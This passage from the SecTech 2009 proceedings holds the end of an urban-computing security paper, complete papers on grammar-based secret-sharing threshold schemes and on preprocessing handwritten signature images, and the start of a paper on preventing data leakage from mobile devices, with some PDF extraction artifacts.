⎡t1 ⎤ (Formula 4) ⎢t ⎥ = [ s1 , s2 ,..., sn ]⎢ 2 ⎥ ⎢: ⎥ ⎢ ⎥ ⎣t n ⎦ = s1 ⋅ t1 + s2 ⋅ t 2 + ... + sn ⋅ t n

32

H. Ko, J. Choi, and C. Ramos Table 3. Experiment Items The number of CS The number of SS The number of CP The number of CP a user The number of User Content Length (Size) Key Length for Security Link Delay Stay Time a User (sec) Empty CRL Size (Structure) Simple Certificate Size Experiment Time

Contents 1 2 3 1.4 100 Random (100) 512 bits 10ms Random (100) 55kb 1kb 1000 sec

Environment of experiments are to be table 3. The CROSSCERT, which is a security company (VeriSign) in Korea usually assigns one CRL file a 1000 for certificate. And, there is 55kb size in emptied CRL, each certificate is assigned by 3kb size. However, as a result of the analysis of our certificate, normally, the size of a certificate be in less and more than 1kb. (Maybe, if we use the expand area of our certificate, that size will be bigger than 1kb in future). Finally, we defined the average certificate size is 1kb in this article. 3.2 Result of Experiments The number of CP is defined as xn in experiment. In future, the definition for users will be defined with user’s requesting. CASE 1: User A wants to receive the information from 2 CP, weight of CP.1 is 0.5, CP.2 is 0.3. The content size in CP.1 is 4 and in CP.2 is 2, and then each transferring time is 0.3 and 0.4. ANSWER 1: f 1 ( x n × w n ) + f 2 ( s n × t n ) = {( 2 × 0 . 5 ) + ( 2 × 0 . 3 )} + {( 4 × 0 . 3 ) + ( 2 × 0 . 4 )} = 1 .6 + 2 .0 = 3 .6

Finally the total cost for user A is 3.6. We applied this algorithm to 100 users with the same way. We let them sequentially enter in experiment area (service area) during experiment time. Table 4 is the result of average interarrival, average waiting time in queue, average cost. Table 4. Results Item Average Time

Interarrival Time 4.47

Waiting Time in Queue 3.47

Total Cost 0.57

A Study on Secure Contents Using in Urban Computing

33

Fig. 7. The result of experiment

Average entering time to be in service area is 4.47 sec. The service time from CP after entered that area is 3.47 sec. We called waitingTime in Queue. This waitingtime would be used in Notation 1 as a kind of Weight. Therefore, if waitingtime gets longer, Total Costs will be getting increasing. Lastly, the total cost for 100 users is 0.57. Fig. 7 shows us the result of experiment. There are 33 users in between 0 to 2 in total cost that is the minimum cost and the maximum cost is 2 users which cost are 16.

4 Conclusion We studied the way, which how users receive their requesting information during their moving by CP near there in safety. Of course, we partially put an algorithm for security between users and CPs like authentication. However, still there are some insufficiency points to detailed researching about user’s variable, user’s and CP’s weight etc. Therefore, we need to study that issues in more detail in future, and have to more study a correspondence for security changing of users and CPs.

Acknowledgments This work is partially supported under the support of the Portuguese Foundation for Science and Technology (FCT) in the aims of Ciência 2007 program for the hiring of Post-PhD researchers.

References 1. IST Advisory Group, Scenarios for Ambient Intelligence in 2010, European Commission (2001) 2. Ramos, C., Augusto, J.C., Shapiro, D.: Ambient intelligence the next step for artificial intelligence. IEEE Intelligent Systems 23(2), 15–18 (2008)

34

H. Ko, J. Choi, and C. Ramos

3. Franinovic, K., Visell, Y.: Modulating Urban Atmospheres: Opportunity, Flow, and Adaptation. In: Urban Computing Conference 2005, Metapolis and Urban Life Workshop Proceeding, pp. 82–87 (2005) 4. Ko, H., Ramos, C.: A Study on Security Framework for Ambient Intelligent Environment (ISyRAmI SF: ISyRAmI Security Framework). In: ICWMC 2009, pp. 93–98 (2009) 5. Ma, M.: Authorization delegation for u-City in subscription-based. Computers & Security, 371–378 (2006) 6. Yang, S.J.H.: Context-Aware Ubiquitous Learning Environments for Peer-to-Peer Collaborative Learning. Educational Technology & Society, Security, 188–201 (2006) 7. Chen, G., Kotz, D.: A Survey of Context-Aware Mobile Computing Research, Technical Report: TR2000-381. Dartmouth College, Hanover, NH, USA 8. Ward, A., Jones, A., Hopper, A.: A new location technique for the active office. IEEE Personal Communications 4(5), 42–47 (1997) 9. Ma, M.: Authorization delegation for u-City in subscription-based. Computers & Security, 371–378 (2006) 10. Meiier, R., Cahill, V.: Location-Aware Event-Based Middleware: A Paradigm for Collaborative Mobile Application. Computers & Security, 371–378 (2006) 11. Yang, S.J.H.: Context-Aware Ubiquitous Learning Environments for Peer-to-Peer Collaborative Learning. Educational Technology & Society, Security, 188–201 (2006) 12. Vieira, M.S., Rosa, N.S.: A Reconfigurable Group Management Middleware Service for Wireless Sensor Networks. In: MPAC 2005, November 2005, pp. 1–8 (2005) 13. Sivaharan, T., Blair, G., Conlson, G.: GREEN: A Configurable and Re-configurable Publish-Subscribe Middleware for Pervasive Computing. In: Meersman, R., Tari, Z. (eds.) OTM 2005. LNCS, vol. 3760, pp. 732–749. Springer, Heidelberg (2005)

Shadow Generation Protocol in Linguistic Threshold Schemes Marek R. Ogiela and Urszula Ogiela AGH University of Science and Technology Al. Mickiewicza 30, PL-30-059 Krakow, Poland {mogiela, ogiela}@agh.edu.pl

Abstract. The field of secret splitting algorithms has recently seen solutions based on using syntactic methods to create further information used as an additional component of the split secret. One of such solutions comprises linguistic threshold schemes which use context-free grammars to code the input string representing the shared secret. This study describes a general protocol for creating secret components using this approach. This solution allows the known, traditional secret sharing algorithms to be extended into algorithms executed in a hierarchical way. Such methods can then be used to split and manage information in various information structures that have linear characteristics or divisional dependencies. Keywords: Secret sharing, threshold schemes, information management.

1 Introduction One important problem related to using information splitting or sharing algorithms is the ability to use them for the intelligent management and distribution of important data. Such operations are carried out in modern enterprises, corporations or state institutions. In this case, information management is particularly important with regard to data that is strategic for the given organization. It requires the use of intelligent solutions that allow data to be allocated according to certain rights. This has led to the need to develop new, advanced algorithmic solutions that would facilitate such an intelligent allocation of important data, and then allocating the appropriate parts to the decision-making groups at various management levels or having the appropriate access rights to the shared data that is of strategic nature. Obviously two types of a structural information split can be distinguished. This split can, for example, be hierarchical or by layers. The principal difference between the presented types of splits concerns the method of introducing the split itself. When a split is made within homogenous, uniform groups of layers, then it is a layer split, whereas if the split is made regardless of the homogeneity of the group or layer but by reference to several groups ordered hierarchically, this is a hierarchical split. Information can be divided both within the entire structure in which some hierarchical dependency is identified, or within a given group as well as within any D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 35–42, 2009. © Springer-Verlag Berlin Heidelberg 2009

36

M.R. Ogiela and U. Ogiela

homogenous layer. This is why, depending on the type of information split, it makes sense to identify correctly selected information splitting algorithms. Algorithms for the multi-level splitting of confidential or secret information are designed using structural analysis and the linguistic recording of data. The structural analysis used for this kind of task is based on the analysis of the structure of the business organisation and can be designed for a specific organisation, or splitting and sharing algorithms can be designed for a broader group of organisations, which proves that the method is universal. However, one must be aware that the group should be homogenous in terms of the structure of organisations forming part of it. Another important component of information splitting algorithms is the use of linguistic data recording methods [13]. This type of information recording and presentation refers to a syntactic data analysis. The key in this approach is that it uses mathematical formalisms and linguistic methods which allow an additional stage to be introduced which enhances the functionality of classical threshold schemes of information sharing [3, 4, 10, 12, 16]. Such enhanced linguistic schemes and information splitting protocols will be presented in this paper.

2 Shadow Generation Protocol in Linguistic Schemes First, a generalized algorithm will be described that allows coding to be carried out using the approach of mathematical linguistics. Context-free grammars will be used here to introduce an additional stage of coding the input representation of the shared data or the secret allocated in a hierarchical way. In practice, the use of such grammar will allow us to strengthen the secret splitting algorithm used and to obtain a certain additional secret (a part of the split information) in the form of rules of the used formal grammar. The general methodology of using formal languages to enhance a traditional threshold scheme is as follows: 1. one of the classical secret sharing schemes (e.g. Shamir’s, Blakley’s or Tang’s algorithm [6, 14, 16]) is used to encode the input secret; 2. the split data is transformed into a bit sequence; 3. a new formal grammar is defined which generates bit or bit blocks positions for the shared data; 4. the bit (or bit blocks) sequence is parsed with an analyser defined for the introduced grammar; 5. the parsing generates a sequence of grammar rules which allow the bit representation of the shared secret to be generated; 6. the secret represented by a sequence of production numbers is split using the threshold scheme selected (in step 1); 7. shadows are distributed to particular participants of the protocol. These stages determine the basic actions necessary to generate the components of shared information which can be communicated to the participants of the entire procedure of allocating the split data. A proposal for splitting information using context-free grammars is presented in Fig 1.

Shadow Generation Protocol in Linguistic Threshold Schemes

37

Fig. 1. A linguistic threshold scheme. The enhancement consists in using a grammar at the stage of changing the bit representation into sequences of numbers of grammar rules.

The solution presented in Fig. 1 shows how selected information is converted into its bit or bit block representation which is coded using the proposed grammar. The coded form of information can be split in the way presented in Figure 1. This is an (m, n)-threshold split in which just the main part of the secret, that is m or n-m of secrets is necessary to reconstruct the split secret. Every one of these main split parts allows the split secret to be successfully reconstructed. However, combining these components yields only the contents of the secret, which allows the input information to be decoded using grammatical reasoning methods (i.e. meaning analysis methods). The proposed modification of a threshold algorithm for information splitting and sharing consists in using a grammar at the stage of converting the bit representation into sequences of numbers of linguistic rules in the grammar. After this transformation is completed, any secret splitting scheme can be used, and the components can be distributed among any number n of protocol participants. If the allocation of grammatical rules remains a secret, then this is an arbitration protocol in which the reconstruction of a secret by the authorised group of shadow owners requires the involvement of a trusted arbitrator who has information on grammar rules. If the grammar is disclosed, the secret can be reconstructed without the involvement of a trusted person just on the basis of the secret components possessed by the authorised group of participants of the information splitting algorithm.

38

M.R. Ogiela and U. Ogiela

The proposed information sharing algorithm may apply to the execution of any classical (m, n)-threshold secret sharing algorithm. In the case of data splitting and sharing algorithms, the split secret is not the bit sequence itself, but the sequence composed of numbers of syntactic rules of the grammar introduced for the splitting. Depending on its structure and type, it can contain values of two or more bits. This is why the stage of converting the bit representation of the shared secret can also be generalised from the version coding single bits to the coding of bit blocks of various lengths. However, to avoid too many generation rules in the defined grammar, it is worth imposing a restriction on the length of coded bit blocks in the proposed scheme. It seems easy and natural to consider bit blocks no longer than 4-5 bits. To illustrate the idea of an enhanced linguistic coding, a generalised version of a linguistic information splitting algorithm will be presented for a grammar that converts blocks of several bits. G=( VN, VT, SP, STS), where: VN = {SECRET, BIT_BLOCK, 1B, 2B, 3B, 4B, 5B} – a set of non-terminal symbols VT = {ONE BIT, TWO BITS, THREE BITS, FOUR BITS, FIVE BITS, λ} – a set of terminal symbols which define each bit block value. {λ} – defines an empty symbol. STS = SECRET - the grammar start symbol. A production set SP is defined in following way. 1. 2. 3. 4. 5. 6. 7. 8. 9.

SECRET Æ BIT_BLOCK BIT_BLOCK Æ BIT_BLOCK BIT_BLOCK BIT_BLOCK Æ 1B | 2B | 3B | 4B | 5B BIT_BLOCK Æ λ 1B Æ ONE BIT 2B Æ TWO BITS 3B Æ THREE BITS 4B Æ FOUR BITS 5B Æ FIVE BITS

This type of grammar allows more complex information coding tasks to be executed, as the information is converted into the bit representation and in the next step is converted into a record of 2, 3, 4 or 5-bit clusters which become the basis for coding the original information. With regard to the proposals of the linguistic enhancement of threshold schemes presented here it is notable that the level of security achieved is independent of the length of blocks subjected to conversion with the use of rules of the introduced grammar. The methods of multi-level information splitting or sharing presented in this chapter, which use bit blocks of various lengths, show how information splitting algorithms can be significantly enhanced by adding elements of linguistic and grammatical data analysis. This is a novel solution. The length of bit blocks has a major impact on the speed and length of the stage of coding the input information representation, which is the stage that prepares information to be coded as a secret.

Shadow Generation Protocol in Linguistic Threshold Schemes

39

3 Application of Linguistic Threshold Schemes in Layered and Hierarchical Structures The essence of the presented approach is that within a given layer it is possible to divide secret information in such a way that every person involved in the process of encrypting the information becomes the owner of a certain part of the secret. Even though such persons are equal owners of parts of the secret from the perspective of the information splitting process, the secret can be recreated omitting some of them. If the secret is split between the members of a given group in equal parts, this means that every member will receive the same amount of the secret, and then all of them have to reveal their parts to recreate the original message. There is obviously no absolute requirement for all owners of parts of the secret to reveal their parts, because, for example, threshold schemes for information splitting (like the Tang’s algorithm [16]) guarantee that secret information can be recreated with the involvement of a smaller number of participants than the number between which the shares were distributed. Since every participant of the information splitting and also the information reconstruction process is treated as an equal process participant, there is no person in the group who could reconstruct the information without involving others. Such a split of information between the members of a given group in which every one has the same privileges is a layer split. It is worth noting that the layer split may refer to the following types of splits: • Of various secrets split in various layers in the same (similar) way - this situation means that the secret is split in the same way (in the sense of the method), regardless of the layer dealing with this secret. Obviously, the number of participants of the secret split in various layers is determined by the instance supervising the split (the decision-maker), and in addition it is unchanged in the remaining layers. What does change is the information constituting the secret being split in the specific layer. • Of the same secret split in different ways depending on the layer - if we take information A, which can be a secret for several layers within which it is split, then, for instance, this secret can be split among n participants in the first layer, the same secret can be split in the superior (second) layer between n-k participants, which is a number smaller than in the subordinate layer, and in the third layer the same secret can be split among n-k-p participants. The values n, k, p can be defined freely depending on the size of the group from which the selected persons - secret trustees - are chosen. • Various secrets in different layers - this type of a split concerns a situation in which different pieces of information can be split between different groups of persons. So for a business organisation this situation may mean that at the decisionmaking level the secret split comprises specific strategic information of the organisation, but at the executive stage marketing and promotion information of the organisation may be split. The mentioned layer splits of secrets can apply to splitting information at various levels - the operational, tactical and strategic levels of a given organisation. Of course,

40

M.R. Ogiela and U. Ogiela

the selection of the appropriate splitting method depends on the type of the organisational structure and the importance of the shared information. Another type of business structure is a hierarchical structure. The essence of the hierarchical approach lies in considering the hierarchy operating within the business organisation. It is the hierarchical nature of business organisations that allows hierarchical secret splits to be introduced. Such a split may have the form of a split of varied information (secret) within a given hierarchy, taking into consideration that higher up in the hierarchy this secret can be reconstructed by other trustees (or a single other trustee) of parts of the secret. This situation is illustrated in Fig. 2. Hierarchical information splits are much more frequent than layered splits, as the hierarchical nature of the structure is much more commonplace in various types of organisations. This is why a hierarchical information split can be used both in lean and flat structures, taking into account the superiority of persons managing the organisation and the subordination of particular departments and their managers. In the case of a hierarchical information split, it is noticeable that secret splits are very varied and the ways of splitting and sharing information are very numerous and depend on the individual situation of the organisation and the materiality of shared information. This is why the methods of secret splitting presented in this publication, concerning both the hierarchical and the layered split, can be used in various types of organisational structures.

Fig. 2. Hierarchical secret split

Shadow Generation Protocol in Linguistic Threshold Schemes

41

4 Conclusion This publication proposes a new protocol for executing linguistic threshold schemes which use context-free sequential grammars. This protocol allows known threshold schemes to be extended to include an additional stage of coding the shared secret using an appropriately defined grammar. The coding can be applied to single bits of the input representation of the split secret or blocks consisting of 2, 3 or more bits. For the general scheme of this information split, the authors have also presented its possible applications for the intelligent management and distribution of data in organisational structures of a linear and hierarchic type. Important strategic data can be distributed in institutions of such structure due to the protocol, described here, whereby data is split and a part of it allocated to persons at the appropriate levels. The proposed method, in addition to its high utility, also introduces certain improvements to previously known techniques of information splitting. Such techniques, even though they are completely secure, require the participation of a trusted instance or an arbiter for the correct division or recreation of the information. The presented protocol is a universal solution suitable for using both as an arbitration protocol and as a protocol requiring no trusted party to participate. In the second case, executing it introduces an additional information component allocated to one of the parties participating in the information splitting procedure. Acknowledgements. This work has been supported by the AGH University of Science and Technology under Grant No. 10.10.120.783.

References 1. Asmuth, C.A., Bloom, J.: A modular approach to key safeguarding. IEEE Transactions on Information Theory 29, 208–210 (1983) 2. Ateniese, G., Blundo, C., De Santis, A., Stinson, D.R.: Constructions and bounds for visual cryptography. In: Meyer auf der Heide, F., Monien, B. (eds.) ICALP 1996. LNCS, vol. 1099, pp. 416–428. Springer, Heidelberg (1996) 3. Beguin, P., Cresti, A.: General short computational secret sharing schemes. In: Guillou, L.C., Quisquater, J.-J. (eds.) EUROCRYPT 1995. LNCS, vol. 921, pp. 194–208. Springer, Heidelberg (1995) 4. Beimel, A., Chor, B.: Universally ideal secret sharing schemes. IEEE Transactions on Information Theory 40, 786–794 (1994) 5. Blakley, G.R.: Safeguarding Cryptographic Keys. In: Proceedings of the National Computer Conference, pp. 313–317 (1979) 6. Blakley, B., Blakley, G.R., Chan, A.H., Massey, J.: Threshold schemes with disenrollment. In: Brickell, E.F. (ed.) CRYPTO 1992. LNCS, vol. 740, pp. 540–548. Springer, Heidelberg (1993) 7. Blundo, C., De Santis, A.: Lower bounds for robust secret sharing schemes. Inform. Process. Lett. 63, 317–321 (1997) 8. Charnes, C., Pieprzyk, J.: Generalised cumulative arrays and their application to secret sharing schemes. Australian Computer Science Communications 17, 61–65 (1995) 9. Desmedt, Y., Frankel, Y.: Threshold Cryptosystems. In: Brassard, G. (ed.) CRYPTO 1989. LNCS, vol. 435, pp. 307–315. Springer, Heidelberg (1990)

42

M.R. Ogiela and U. Ogiela

10. van Dijk, M.: On the information rate of perfect secret sharing schemes. Designs, Codes and Cryptography 6, 143–169 (1995) 11. Hang, N., Zhao, W.: Privacy-preserving data mining Systems. Computer 40(4), 52–58 (2007) 12. Jackson, W.-A., Martin, K.M., O’Keefe, C.M.: Ideal secret sharing schemes with multiple secrets. Journal of Cryptology 9, 233–250 (1996) 13. Ogiela, M.R., Ogiela, U.: Linguistic Extension for Secret Sharing (m, n)-threshold Schemes. In: SecTech 2008 - 2008 International Conference on Security Technology, Hainan Island, Sanya, China, December 13-15, pp. 125–128 (2008), ISBN: 978-0-76953486-2, doi:10.1109/SecTech.2008.15 14. Shamir, A.: How to Share a Secret. Communications of the ACM, 612–613 (1979) 15. Simmons, G.J.: An Introduction to Shared Secret and/or Shared Control Schemes and Their Application in Contemporary Cryptology. In: The Science of Information Integrity, pp. 441–497. IEEE Press, Los Alamitos (1992) 16. Tang, S.: Simple Secret Sharing and Threshold RSA Signature Schemes. Journal of Information and Computational Science 1, 259–262 (2004)

Analysis of Handwritten Signature Image Debnath Bhattacharyya1, Poulami Das1, Samir Kumar Bandyopadhyay2, and Tai-hoon Kim3 1

Computer Science and Engineering Department, Heriatge Institute of Technology, Kolkata-700107, India {debnathb,dasp88}@gmail.com 2 Department of Computer Science and Engineering, University of Calcutta, Kolkata-700009, India [email protected] 3 Hannam University, Daejeon-306791, Korea [email protected]

Abstract. Handwritten Signature Identification is a classical work area in the line of Computer Science and Technology since last few years. Various new techniques of Image Analysis also attracting the Computer Scientists as well. Firstly, Pixel clustering is used to transform the signature image into bi-color image. Then secondly, instead of considering the whole image, only signature area is extracted. Thirdly, by using Image scaling technique the signature image resized along the coordinate directions. As different techniques are used to subsample (image after transformation) which will be discussed in turn. Fourthly, a different technique is used for thinning to reduce the threshold output of an edge detector algorithm is used to lines of a single pixel thickness. In this paper we propose the above mentioned series of techniques as the preprocessing analysis part of Handwritten Signature Recognition. Keywords: Skeletonization, Scaling, ITA (Image Thinning Algorithm), ROI (Region of Interest).

1 Introduction Handwritten Signature Recognition is a generalized way of authenticity. However, it is easy to copy, signature of one person may vary in different times, and it is still more common and widely recognized technique for authentication. There are 2 (Two) approaches available for Handwritten Signature Recognition: a) On-Line and b) OffLine. This Research is highlighted on the static features of a Handwritten Signature, which can be considered as Off-Line Approach [7]. The Images of the Handwritten Signature is taken repeatedly considering as the “Signature of a person may vary widely time to time”, which are special type of objects. From these sample Signatures an average will be taken and stored for authentication in future. At this point the type of errors likes to reduce the chance of rejection of genuine Signatures and improve forgery resistance. Incorporating those two aspects – acceptance of the variance and the requirement for exactness of certain D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 43–50, 2009. © Springer-Verlag Berlin Heidelberg 2009

44

D. Bhattacharyya et al.

features in one system is a very difficult task and still there is no perfect solution. The techniques developed so far, is that, to extract Morphological Features from Handwritten Signature Image and by analyzing that Image decisions can be taken [6].

2 Previous Works Image can be represented morphologically, using Image Dilation and Erodes. The fundamental operations associated with an object are the standard set operations union, intersection, and complement plus translation, and Boolean Convolution [1]. Binary Image Morphology is taken into account based on behavior of Binary Images, Erosion and Dilation, consideration of foreground and background of images, Blur, Effect of addition of noise, translationally invariant methods for pattern matching [2]. Morphological Filtering of image, a theory introduced in 1988 in the context of mathematical morphology. Research on lattice framework. The emphasis is put on the lattices of numerical functions in digital and continuous spaces and Morphological Filters [3]. The usefulness of the hit-miss transform (HMT) and related transforms for pattern matching in document image application is examined. HMT is sensitive to the types of noise found in scanned images, including both boundary and random noise, a simple extension, the Blur HMT, is relatively robust. The noise immunity of the Blur HMT derives from its ability to treat both types of noise together, and to remove them by appropriate dilations [4]. The adaptation is achieved using a tradeoff parameter in the form of a nonlinear function of the local saturation. To evaluate the performance of the proposed algorithm, a deigned psychophysical experiment is used to derive a metric denoted as the average value for the psychophysical evaluation in percent (APE%). Results of implementing the proposed APE show that an APE=73 to 96% can be achieved for basic morphological operators, i.e., dilation, erosion, opening, and closing. APE value depends on the size and shape of the structuring element as well as on the image details. The proposed algorithm has also been extended to other morphological operators, such as image smoothing (noise suppression), top hat, gradient, and Laplacian operators. In the case of a smoothing operation, an average peak signal-tonoise ratio (PSNR)=31 to 37 dB is achieved at various structuring elements and applied noise variances, while good results are achieved with the proposed top-hat operators [5]. Whenever an image is digitized, i.e., converted from one form to another some form of degradation occurs at output [6]. There is no image processing system which can produce an ideal image. Image enhancement is the improvement of the appearance of the image. Enhancement can be done via, contrast intensification, smoothing and edge sharpening. Algorithm for spatial domain and frequency domain techniques are used widely. Spatial domain is dealt with neighborhood of single pixel and frequency domain dealt with global filters (masks) [6]. Alessandro Zimmer, Lee Luan Ling, 2003, proposed a new hybrid handwritten signature verification system, where the on-line reference data acquired through a

Analysis of Handwritten Signature Image

45

digitizing tablet serves as the basis for the segmentation process of the corresponding scanned off-line data. Local foci of attention over the image were determined through a self-adjustable learning process in order to pinpoint the feature extraction process. Both local and global primitives were processed and the decision about the authenticity of the specimen defined through similarity measurements. The global performance of the system was measured using two different classifiers [7]. A method for the automatic verification of handwritten signatures was described by Ramanujan S. Kashi, William Turin, and Winston L. Nelson in 1996. The method based on global and local features that summarize aspects of signature shape and dynamics of signature production. They compared with their previously proposed method and shown the improvement of current version [8].

3 Our Work We propose following four algorithms to achieve our goal. Those algorithms are: 3.1 Transform Gray Signature Image to Bi-Color Signature Image Input: Gray scale Signature Image. Output: Bi-Color Signature Image. a. Open Gray scale Signature Image in Read Mode. b. Read the Pixel. c. Check the Pixel intensity value: if the value is less than 255 (gray value for white color) Then convert it to 0 Else no modification in the Pixel value. d. Rewrite the Pixel with changed intensity value e. If not ‘end of file’ Then go to Step-b. f. Close image file. 3.2 Extracting Region of Interest (ROI) Input: Bi-Color Signature Image (Output of 3.1 Algorithm). Output: Image only with Signature Region. a. Open Image1 (Bi-Color Signature Image) File in Input Mode. b. Open Image2 File in Output Mode. c. Declare an Integer 2D Matrix of [n x m], where, n and m are width and height of Image1. d. Get RGB Value[i, j] of Image1 and store it to Matrix[i, j] position. e. GotoStep-4 until end of Image1 File Matrix [n, m] is generated with RGB Weight of Image1. f. Identify First row where First Black RGB Color is occurred in Matrix[n, m], i.e., p. g. Identify First column where First Black RGB Color is occurred in Matrix[n, m], i.e., q. h. Here, Matrix[p, q] is the starting position of Signature Region of Image1. i. Identify Last row where Last Black RGB Color is occurred in Matrix[n, m], i.e., x.

46

D. Bhattacharyya et al.

j. k. l.

Identify Last column where Last Black RGB Color is occurred in Matrix[n, m], i.e., y. Here, Matrix[x, y] is the end position of Signature Region of Image1. Get RGB Values of the Matrix…..[p, q] to [x, y] Position and Write into Image2 File.

3.3 Scaling Considering the resultant bi-color signature image from the algorithm mentioned in 3.2. Mathematics behind the scaling we used and tested randomly as given below…. a. b.

c.

d.

e.

f.

Input image is loaded via Toolkit and Media-Tracker. Four (4) arguments contain the maximum size of the Image to be created. The actual size of the Image will be computed from that maximum size and the actual size of the image (all sizes are given as pixels). The code will scale the Input Image correctly. If the two arguments for the maximum Image size are both 100 and the image that was loaded is 400 times 200 pixels large, we want the image to be 100 times 50 pixels large, not 100 times 100, because the original image is twice as wide as it is high. A 100 times 100 pixel image would contain a very skewed version of the original image. Now that we have determined the size of the image we create a BufferedImage of that size, named iImage. We have taken another object for that new image and call its drawImage method to draw the original image on that new image. The call to drawImage does the actual scaling. The rendering and bilinear interpolation can be used (performance will slowdown) and speed more important. For nicer results (at least in some cases) we have used INTERPOLATION BICUBIC instead of INTERPOLATION BILINEAR. In order to save the scaled-down image to a file, we have created a buffered FileOutputStream with the second argument as name and initialize the necessary objects. The quality argument from the command line is converted from the interval 0 to 100 to the interval 0.0f to 1.0f, because that's what the codec expects (I mostly used 0.75f). The higher that quality number is, the better the resulting image quality, but also the larger the resulting file.

3.4 Image Thinning Algorithm (ITA) Input: Resultant Signature Image from 3.3 Algorithm Output: Thinned Signature Image a. b. c. d.

Take the surrounding pixels of foreground. Foreground points must have at least a single background neighbor. Reject points that with more than one foreground neighbor. Continue Steps [b to d] until locally disconnect (divided into 2 parts) region with Pixel iterate until convergence.

Analysis of Handwritten Signature Image

47

Implemented pseudocode: BufferedImage bi = ImageIO.read (new File("Signature_Image")); int[][] matrix = new int[bi.getWidth()][bi.getHeight()]; for(int i=0; i
4 Result Extensive testing has been done with a Signature Database composed of 131 users (individuals) Signatures, each user with 24 Handwritten Signatures and 10-trained forgery Signatures [Handwriting Databases: http://www.gpds.ulpgc.es/download/].

48

D. Bhattacharyya et al.

One such testing result is taken and shown here in this paper. Fig. 1 shows a user signature in original 256-color image and different ink color is used, but, other than black. Bi-Color clustered image is the output image shown in Fig. 2, and this is the output of our “Transform Gray Signature Image to Bi-Color Signature Image” algorithm. The one more advantage of this algorithm is that it is very much useful for noise reduction; this can be achieved by tuning the threshold value during conversion to BiColor Image. The resultant image is passed through our “Extracting Region of Interest (ROI)” algorithm; the effect is shown in Fig. 3.

Fig. 1. 256 BMP Image (Gray) [246 x 146], Before Pixel Clustering

Fig. 2. Bi-Color Image [246 x 146], after Pixel Clustering

Fig. 3. Bi-Color Image (ROI) [223 x 73]

Fig. 4. Bi-Color Scaled Image [150 x 70]

Analysis of Handwritten Signature Image

49

Fig. 5. Thinned Signature Image [150 x 70] Table 1. Time Taking for Gray to Bi-color and ROI

Test No. # 1 2 3

Image size [n x m] 246 x 146 422 x 229 670 x 352

Millisec. 234 283 310

Sec. 0.234 0.283 0.310

Table 2. Time Taking for Scaling and ITA

Test No. # 1 2 3

Image size [n x m] 223 x 73 337 x 113 535 x 252

Millisec. 193 232 281

Sec. 0.193 0.232 0.281

Then the Resultant Signature Image is passed through our Scaling algorithm and the result is shown in Fig. 4. Then the image is passed through our ITA algorithm, where we have used our own technique (Fig. 5), but, other than some widely used masking algorithms. Algorithms are implemented in jdk1.6 with Java Advance Imaging (JAI 1.2.2). Hardware configuration is Pentium Dual CPU with 1.8 GHz Processor with 1 GB RAM. Fedora 9 is used as Operating System. Table 1 shows the various experimental times with different image sizes. Programs are giving results in polynomial times. Times taken by first 2 algorithms are shown in Table 1. Table 2 shows the times taken by Scaling and ITA algorithms. Both the sets of result in Table 1 and Table 2 proves that size of images do not affect much in the final output.

5 Conclusion This paper is emphasized on various Image Processing algorithms. These are preprocessing part of Signature Images required for future authentication and recognition. In this paper we propose four different algorithms very newly. Initially, gray scale signature image has been taken and gradually through four different algorithms final output is extracted. The result derived finally, has been outlined in term of times consumed. We are also working towards the authentication and recognition of signature and will be detailed in future publications.

50

D. Bhattacharyya et al.

Acknowledgement This work was supported by the Security Engineering Research Center, granted by the Korea Ministry of Knowledge Economy. This work has successfully completed by the active support of Prof. Tai-hoon Kim, Hannam University, Republic of Korea.

References 1. Young, T., Gerbrands, J.J., van Vliet, L.J.: Morphology-based Operations, http://www.ph.tn.tudelft.nl/Courses/FIP/noframes/ fip-Morpholo.html (last visited on May 16, 2009) 2. Bloomberg, D.S., Vincent, L.: Pattern Matching using the Blur Hit-Miss Transform. Journal of Electronic Imaging 9(2), 140–150 (2000) 3. Serra, J., Vincent, L.: An Overview of Morphological Filtering. Circuits, Systems and Signal Processing 11(1), 47–108 (1992) 4. Bloomberg, D.S., Vincent, L.: Blur Hit-Miss Transform and its Use in Document Image Pattern Detection. In: Proceedings of SPIE, Document Recognition II, San Jose CA, March 30, vol. 2422, pp. 278–292 (1995) 5. Al-Otum, H.M., Uraikat, M.T.: Color image morphology using an adaptive saturation-based technique. Optical Engineering, Journal of SPIE 43(6), 1280–1292 (2004) 6. Dutta Majumder, D., Chanda, B.: Digital Image Processing and Analysis. Prentice-Hall of India Pvt. Ltd., Englewood Cliffs (2006) 7. Zimmer, A., Ling, L.L.: A Hybrid On/Off Line Handwritten Signature Verification System. In: International Conference on Document Analysis and Recognition, Edinburgh, Scotland, August 3-6, vol. 1, pp. 424–428 (2003) 8. Kashi, R.S., Turin, W., Nelson, W.L.: On-line handwritten signature verification using stroke direction coding. Optical Engineering, SPIE Digital Library 35, 2526 (1996)

The Design of Signature Selection for Protecting Illegal Outflow of Sensitive Information in Mobile Device Bo-heung Chung, Min-ho Han, and Ki-young Kim Electonics and Telecommunications Research Institute, 138 Gajeongno, Yuseong-gu, Daejeon, Korea {bhjung, mhhan, kykim}@etri.re.kr

Abstract. Illegal outflow of important data in a mobile device is a sensitive and main issue in mobile security. Within restricted resources such as small memory size and low battery capacity, simple and efficient method is needed to lessen much effort for preventing this illegal activity. In this paper, we discuss a protection technique taking into account these considerations. Some data is extracted from important file, it is used to prevent illegal file transfer and modification. To avoid attacker’s easy prediction the location of the selection of this data, it is selected within whole extent of the file by equal distribution. To avoid huge increase of selected data than that of specific location selection, through analysis of the length and number of files, the number of selection is restricted at minimum size. To decrease computational overhead to calculate the number and location of the data to be selected, it will be done that precomputation for this information in advance. With the help of this technique, it has advantages that illegal outflow in a mobile device can be protected and prohibited effectively and a mobile device can be managed securely within low overhead. Keywords: sensitive information protection, illegal outflow prevention, mobile device security.

1 Introduction Recently, mobile devices get more popular and it is widely used. As the capabilities of these devices increase, they are not simple and additional anymore; they provide more powerful computing power to deal with various services together: E-mail, business document processing, banking, and entertainment. Due to the rapid evolution of mobile device, some important information(ex. user’s data of contact list and certifications, and so on.) of a user used to be kept in its internal storage. This data may be leaked by malicious programs such as virus and worm or carelessness of a user. It is known how to solve this problem well enough so that we must protect sensitive information from unauthorized access or modification, or programs from unauthorized execution. The more important issue is the leakage of this information through external storage devices. For example, if the banking account of a user may be leaked without consent, it will be a critical problem in financial and privacy aspect. To prevent this action, data or files transfer from mobile device to external storage D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 51–56, 2009. © Springer-Verlag Berlin Heidelberg 2009

52

B.-h. Chung, M.-h. Han, and K.-y. Kim

